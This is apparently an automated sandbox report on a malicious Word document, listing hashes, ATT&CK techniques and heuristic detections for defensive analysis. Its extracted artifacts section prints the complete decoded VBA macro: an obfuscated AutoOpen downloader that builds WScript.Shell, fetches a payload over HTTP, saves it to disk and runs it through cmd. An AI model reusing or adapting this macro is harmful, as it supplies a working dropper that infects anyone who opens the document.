Office (OOXML) malware analysis — malicious · 2b6154447f399ad4

MALICIOUS

Office (OOXML)

24.3 KB Created: 2016-02-25 16:55:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2016-03-10

MD5: e716b6fd3bff075cf90303ee0f09436e SHA-1: 62b9791421c66b7b038497ab829aa76be034655d SHA-256: 2b6154447f399ad48c07af09cc38d4b3c99205024567eed150fd82a2653215ee

238 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains obfuscated VBA macros designed to execute automatically upon opening. These macros utilize CreateObject to download a second-stage payload via HTTP and save it to disk, likely for execution. The script attempts to construct a command to run the downloaded payload, indicating a downloader or dropper functionality.

Heuristics 8

VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    aaLkwtRh = RL8Xys7CP.responseBody
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
    Set ADyEMql4S3p = CreateObject("W" & StrReverse("tpircS") & "." & jDlpadtfe(1))
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    Set ADyEMql4S3p = CreateObject("W" & StrReverse("tpircS") & "." & jDlpadtfe(1))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1902 bytes
SHA-256: `43b126a80de96e276185ee09f6de3dadf791aa9fe0b2743ae239712cca933380`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub kQufhpELsuTN(ByVal UmsKwYBpUB, ByVal RL8Xys7CP) On Error Resume Next aaLkwtRh = RL8Xys7CP.responseBody UmsKwYBpUB.Write aaLkwtRh End Sub Sub AutoOpen() On Error Resume Next Dim HUiu827TYRH HUiu827TYRH = StrReverse("m" & "d" & " " & "/") Const KMKM = "km " Const CCCC = " c" jDlpadtfe = Split(StrReverse(ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text), "\|") Dim ADyEMql4S3p Set ADyEMql4S3p = CreateObject("W" & StrReverse("tpircS") & "." & jDlpadtfe(1)) SPWXSy1rHQ5 = ADyEMql4S3p.ExpandEnvironmentStrings(jDlpadtfe(5)) T25eCNGa1 = Split(SPWXSy1rHQ5, "\") lR1WRo4D8ij = UBound(T25eCNGa1) ADyEMql4S3p.Run "c" & StrReverse(KMKM & CCCC & HUiu827TYRH) & StrReverse("rid") & " """ & Mid(SPWXSy1rHQ5, 1, Len(SPWXSy1rHQ5) - Len(T25eCNGa1(lR1WRo4D8ij))) & """", 0, True Set kUH8L7VS = CreateObject(jDlpadtfe(2)) kUH8L7VS.Open Chr$(71) + Chr$(69) + Chr$(84), jDlpadtfe(4), False kUH8L7VS.setRequestHeader "Cache-Control", "no-cache, no-store" Set Xt3OoMnt = CreateObject(jDlpadtfe(3)) Xt3OoMnt.Open kUH8L7VS.send Xt3OoMnt.Type = 1 Application.Run "kQufhpELsuTN", Xt3OoMnt, kUH8L7VS Application.Run "esiVF70", Xt3OoMnt, SPWXSy1rHQ5 Xt3OoMnt.Close ADyEMql4S3p.Run "c" & StrReverse(""" """" trats" & " c" & HUiu827TYRH) & SPWXSy1rHQ5 & """", 0, False End Sub Function esiVF70(ByVal Xt3OoMntTMP, ByVal SPWXSy1rHQ5TMP) Xt3OoMntTMP.SaveToFile SPWXSy1rHQ5TMP, 2 End Function Sub Workbook_Open() On Error Resume Next AutoOpen End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	14336 bytes
SHA-256: `e92dc1c7edcd98ceffdcadf83ba5d507d41694fdf9ccaf42b0d4dbf22b63a169`

Open this report in the interactive analyzer, or submit your own file for analysis.